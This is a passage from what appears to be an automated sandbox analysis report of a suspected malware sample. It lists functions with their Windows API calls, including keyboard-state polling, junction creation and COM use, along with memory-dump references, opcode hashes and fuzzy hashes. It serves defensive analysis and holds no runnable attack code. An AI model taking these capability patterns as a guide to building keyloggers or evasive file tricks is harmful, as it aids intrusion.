                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                                                                                                                                            • String ID: 0
                                                                                                                                                                            • API String ID: 1460738036-4108050209
                                                                                                                                                                            • Opcode ID: 5dbea8989b0fdeb3543410f4ffb30c3eb18d59fa1b2bedc2e8469dc3e0d7a944
                                                                                                                                                                            • Instruction ID: 61189574b3aba72e20c7a4fb13c6ddc045f71c2dfaaa75e61e7c7efccb678911
                                                                                                                                                                            • Opcode Fuzzy Hash: 5dbea8989b0fdeb3543410f4ffb30c3eb18d59fa1b2bedc2e8469dc3e0d7a944
                                                                                                                                                                            • Instruction Fuzzy Hash: B1616EB090025AAFEF25CF68D888AFEBFA8FB45348F140125E851E7351D735AD45CB61
                                                                                                                                                                            Function 008BE3D7 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 178COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetFileVersionInfoSizeW.VERSION(?,?), ref: 008BE3E9
                                                                                                                                                                            • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 008BE40F
                                                                                                                                                                            • _wcslen.LIBCMT ref: 008BE419
                                                                                                                                                                            • _wcsstr.LIBVCRUNTIME ref: 008BE469
                                                                                                                                                                            • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 008BE485
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                                                                                                                                                                            • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                                                                            • API String ID: 1939486746-1459072770
                                                                                                                                                                            • Opcode ID: 0c18a70c5bb51d6ed64b6e478bf8c318b135d0ce354941ee4e2b24e1570743d2
                                                                                                                                                                            • Instruction ID: 69fdccbbf5eb948b11e83263854744805c9f79b2386e7c8bd025926f04d1c6bc
                                                                                                                                                                            • Opcode Fuzzy Hash: 0c18a70c5bb51d6ed64b6e478bf8c318b135d0ce354941ee4e2b24e1570743d2
                                                                                                                                                                            • Instruction Fuzzy Hash: A241E5726403157EEB10AB688C46EFF7B6CFF55710F108065F904E6282EB74DA0196B6
                                                                                                                                                                            Function 008C4678 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101fileCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 008C469A
                                                                                                                                                                            • _wcslen.LIBCMT ref: 008C46C7
                                                                                                                                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 008C46F7
                                                                                                                                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 008C4718
                                                                                                                                                                            • RemoveDirectoryW.KERNEL32(?), ref: 008C4728
                                                                                                                                                                            • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 008C47AF
                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 008C47BA
                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 008C47C5
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                                                                                                                                            • String ID: :$\$\??\%s
                                                                                                                                                                            • API String ID: 1149970189-3457252023
                                                                                                                                                                            • Opcode ID: 7092a506301f90f1e9a0e97baddf616daecd2fdeee53d737faf0ec67e4cdbc7b
                                                                                                                                                                            • Instruction ID: c483e6067b30fb44367fb98725d1c5fb8f128504b54d4d1d86024f315cdea9b9
                                                                                                                                                                            • Opcode Fuzzy Hash: 7092a506301f90f1e9a0e97baddf616daecd2fdeee53d737faf0ec67e4cdbc7b
                                                                                                                                                                            • Instruction Fuzzy Hash: AC31D271900249ABDB20DFA4DC88FEB77BCFF89740F1041A9F619DA164E770D6848B21
                                                                                                                                                                            Function 008BA86D Relevance: 18.2, APIs: 12, Instructions: 188keyboardCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetKeyboardState.USER32(?), ref: 008BA8EE
                                                                                                                                                                            • SetKeyboardState.USER32(?), ref: 008BA959
                                                                                                                                                                            • GetAsyncKeyState.USER32(000000A0), ref: 008BA979
                                                                                                                                                                            • GetKeyState.USER32(000000A0), ref: 008BA990
                                                                                                                                                                            • GetAsyncKeyState.USER32(000000A1), ref: 008BA9BF
                                                                                                                                                                            • GetKeyState.USER32(000000A1), ref: 008BA9D0
                                                                                                                                                                            • GetAsyncKeyState.USER32(00000011), ref: 008BA9FC
                                                                                                                                                                            • GetKeyState.USER32(00000011), ref: 008BAA0A
                                                                                                                                                                            • GetAsyncKeyState.USER32(00000012), ref: 008BAA33
                                                                                                                                                                            • GetKeyState.USER32(00000012), ref: 008BAA41
                                                                                                                                                                            • GetAsyncKeyState.USER32(0000005B), ref: 008BAA6A
                                                                                                                                                                            • GetKeyState.USER32(0000005B), ref: 008BAA78
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: State$Async$Keyboard
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 541375521-0
                                                                                                                                                                            • Opcode ID: f49fcbb860dc9e75396023f4b69b353ed21a2e04273c0c1c362bab7eb5497e94
                                                                                                                                                                            • Instruction ID: 0b9b9491b1c83f4f8c4291d8d10ebdb34d161d0e979e8d6ac55f7023367120ce
                                                                                                                                                                            • Opcode Fuzzy Hash: f49fcbb860dc9e75396023f4b69b353ed21a2e04273c0c1c362bab7eb5497e94
                                                                                                                                                                            • Instruction Fuzzy Hash: 5A51D83090479869FB39E7B489507EABFB4FF11340F48459AC5C29B7C2DA949A4CC763
                                                                                                                                                                            Function 008B6555 Relevance: 18.2, APIs: 12, Instructions: 173COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetDlgItem.USER32(?,00000001), ref: 008B6571
                                                                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 008B658A
                                                                                                                                                                            • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 008B65E8
                                                                                                                                                                            • GetDlgItem.USER32(?,00000002), ref: 008B65F8
                                                                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 008B660A
                                                                                                                                                                            • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 008B665E
                                                                                                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 008B666C
                                                                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 008B667E
                                                                                                                                                                            • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 008B66C0
                                                                                                                                                                            • GetDlgItem.USER32(?,000003EA), ref: 008B66D3
                                                                                                                                                                            • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 008B66E9
                                                                                                                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 008B66F6
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3096461208-0
                                                                                                                                                                            • Opcode ID: 5b4cce713e733eeccdf8558f17fbf48e700c5bbf1fca228cef3fe3b7154344e7
                                                                                                                                                                            • Instruction ID: cb12fa16a71a90fbef2d168811d70e18f0f18f4e2e1a057ee28eb2c8a47b274b
                                                                                                                                                                            • Opcode Fuzzy Hash: 5b4cce713e733eeccdf8558f17fbf48e700c5bbf1fca228cef3fe3b7154344e7
                                                                                                                                                                            • Instruction Fuzzy Hash: F9511EB1A00309AFDF18CF68DD89AAEBBB5FB58300F148129F919E7290E7749D148B50
                                                                                                                                                                            Function 008520D8 Relevance: 18.1, APIs: 12, Instructions: 137COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 008521E4: GetWindowLongW.USER32(?,000000EB), ref: 008521F2
                                                                                                                                                                            • GetSysColor.USER32(0000000F), ref: 00852102
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ColorLongWindow
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 259745315-0
                                                                                                                                                                            • Opcode ID: f42a0f492c2a6698f4f40f8be1272f5f2f48daff31e8a2c8c1ffaba70e83cd5d
                                                                                                                                                                            • Instruction ID: f0c5dc85d896d461181d1bd849c1fbc1777564ea0822c339d298a3c362b46f2c
                                                                                                                                                                            • Opcode Fuzzy Hash: f42a0f492c2a6698f4f40f8be1272f5f2f48daff31e8a2c8c1ffaba70e83cd5d
                                                                                                                                                                            • Instruction Fuzzy Hash: 2F41A331140B44AFDF215B289C84BBA7B65FB46322F544645FEA2CB2E1CB31AD469B10
                                                                                                                                                                            Function 008E48F7 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 008E499A
                                                                                                                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 008E49A1
                                                                                                                                                                            • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 008E49B4
                                                                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 008E49BC
                                                                                                                                                                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 008E49C7
                                                                                                                                                                            • DeleteDC.GDI32(00000000), ref: 008E49D1
                                                                                                                                                                            • GetWindowLongW.USER32(?,000000EC), ref: 008E49DB
                                                                                                                                                                            • SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 008E49F1
                                                                                                                                                                            • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 008E49FD
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                                                                                                            • String ID: static
                                                                                                                                                                            • API String ID: 2559357485-2160076837
                                                                                                                                                                            • Opcode ID: 037b569e37612e79461b7df6d9f0a7e125d413b7b5d21e4c13d207bed948664d
                                                                                                                                                                            • Instruction ID: 1671cc77539a445ad278184b89d3068f9bf08101366f85a41faf3d86771e83c4
                                                                                                                                                                            • Opcode Fuzzy Hash: 037b569e37612e79461b7df6d9f0a7e125d413b7b5d21e4c13d207bed948664d
                                                                                                                                                                            • Instruction Fuzzy Hash: 56317C32100259ABDF11AFA5DC48FDA3B69FF0A324F100211FA69EA1A1D735D815DBA4
                                                                                                                                                                            Function 008D458D Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 008D45B9
                                                                                                                                                                            • CoInitialize.OLE32(00000000), ref: 008D45E7
                                                                                                                                                                            • CoUninitialize.OLE32 ref: 008D45F1
                                                                                                                                                                            • _wcslen.LIBCMT ref: 008D468A
                                                                                                                                                                            • GetRunningObjectTable.OLE32(00000000,?), ref: 008D470E
                                                                                                                                                                            • SetErrorMode.KERNEL32(00000001,00000029), ref: 008D4832
                                                                                                                                                                            • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 008D486B
                                                                                                                                                                            • CoGetObject.OLE32(?,00000000,008F0B64,?), ref: 008D488A
                                                                                                                                                                            • SetErrorMode.KERNEL32(00000000), ref: 008D489D
                                                                                                                                                                            • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 008D4921
                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 008D4935
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 429561992-0
                                                                                                                                                                            • Opcode ID: e05db51accba24ddeb97f6f9a4ab00c0cdb25d212bca244a546c57b60c164175
                                                                                                                                                                            • Instruction ID: 5bbb9e291fc60d4e18c7b4c3e429089cde52d3b3d220067d43b06fe6e2e10e5f
                                                                                                                                                                            • Opcode Fuzzy Hash: e05db51accba24ddeb97f6f9a4ab00c0cdb25d212bca244a546c57b60c164175
                                                                                                                                                                            • Instruction Fuzzy Hash: 35C112716043459F9700DF68C88492BBBE9FF89748F145A2EF98ADB221DB31ED05CB52
                                                                                                                                                                            Function 008C83F0 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • CoInitialize.OLE32(00000000), ref: 008C844D
                                                                                                                                                                            • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 008C84E9
                                                                                                                                                                            • SHGetDesktopFolder.SHELL32(?), ref: 008C84FD
                                                                                                                                                                            • CoCreateInstance.OLE32(008F0CD4,00000000,00000001,00917E8C,?), ref: 008C8549
                                                                                                                                                                            • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 008C85CE
                                                                                                                                                                            • CoTaskMemFree.OLE32(?,?), ref: 008C8626
                                                                                                                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 008C86B1
                                                                                                                                                                            • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 008C86D4
                                                                                                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 008C86DB
                                                                                                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 008C8730
                                                                                                                                                                            • CoUninitialize.OLE32 ref: 008C8736
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2762341140-0
                                                                                                                                                                            • Opcode ID: c6e660e704b7ebc8292bbe8a8b640318ad7b94d6b11bdc4c737c41b4aa3317cd
                                                                                                                                                                            • Instruction ID: 42f32050c6b3975f23b6e629ace4bd66376fdce87f65a9e98d9cf3713cf50190
                                                                                                                                                                            • Opcode Fuzzy Hash: c6e660e704b7ebc8292bbe8a8b640318ad7b94d6b11bdc4c737c41b4aa3317cd
                                                                                                                                                                            • Instruction Fuzzy Hash: 6DC10B75A00219EFCB14DFA4C888DAEBBF5FF48305B1484A9E919EB261DB30ED45CB50
                                                                                                                                                                            Function 008B0318 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 008B033F
                                                                                                                                                                            • SafeArrayAllocData.OLEAUT32(?), ref: 008B0398
                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 008B03AA
                                                                                                                                                                            • SafeArrayAccessData.OLEAUT32(?,?), ref: 008B03CA
                                                                                                                                                                            • VariantCopy.OLEAUT32(?,?), ref: 008B041D
                                                                                                                                                                            • SafeArrayUnaccessData.OLEAUT32(?), ref: 008B0431
                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 008B0446
                                                                                                                                                                            • SafeArrayDestroyData.OLEAUT32(?), ref: 008B0453
                                                                                                                                                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 008B045C
                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 008B046E
                                                                                                                                                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 008B0479
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2706829360-0
                                                                                                                                                                            • Opcode ID: 388a685e08c431963a176f2eab09c55e95cd86396fc116ac7bbb0ba487823b4e
                                                                                                                                                                            • Instruction ID: d3b13524bc476566fa7b5e078e24ad7a69af94c55a0a917b5a76c390eb2cee51
                                                                                                                                                                            • Opcode Fuzzy Hash: 388a685e08c431963a176f2eab09c55e95cd86396fc116ac7bbb0ba487823b4e
                                                                                                                                                                            • Instruction Fuzzy Hash: 5A414175A002199FCB04DF68D8849EEBBB9FF58348F008069E955EB361C730E949CF95
                                                                                                                                                                            Function 008EA8E5 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 260windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00852441: GetWindowLongW.USER32(00000000,000000EB), ref: 00852452
                                                                                                                                                                            • GetSystemMetrics.USER32(0000000F), ref: 008EA926
                                                                                                                                                                            • GetSystemMetrics.USER32(0000000F), ref: 008EA946
                                                                                                                                                                            • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 008EAB83
                                                                                                                                                                            • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 008EABA1
                                                                                                                                                                            • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 008EABC2
                                                                                                                                                                            • ShowWindow.USER32(00000003,00000000), ref: 008EABE1
                                                                                                                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 008EAC06
                                                                                                                                                                            • DefDlgProcW.USER32(?,00000005,?,?), ref: 008EAC29
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1211466189-3916222277
                                                                                                                                                                            • Opcode ID: c265b35201b921b7b830a3f301755360129d9687352b1073bf672259d9ac856a
                                                                                                                                                                            • Instruction ID: 92a0ab9389460683262be0f4046e8a5136f92c949f5a36cf5a345f59ceb6fcab
                                                                                                                                                                            • Opcode Fuzzy Hash: c265b35201b921b7b830a3f301755360129d9687352b1073bf672259d9ac856a
                                                                                                                                                                            • Instruction Fuzzy Hash: 2DB19935600259EFDF18CF2AC9857AE7BB2FF85B10F188069EC45DE295D730A980CB61
                                                                                                                                                                            Function 008C8AEF Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetLocalTime.KERNEL32(?), ref: 008C8BB1
                                                                                                                                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 008C8BC1
                                                                                                                                                                            • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 008C8BCD
                                                                                                                                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 008C8C6A
                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 008C8C7E
                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 008C8CB0
                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 008C8CE6
                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 008C8CEF
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
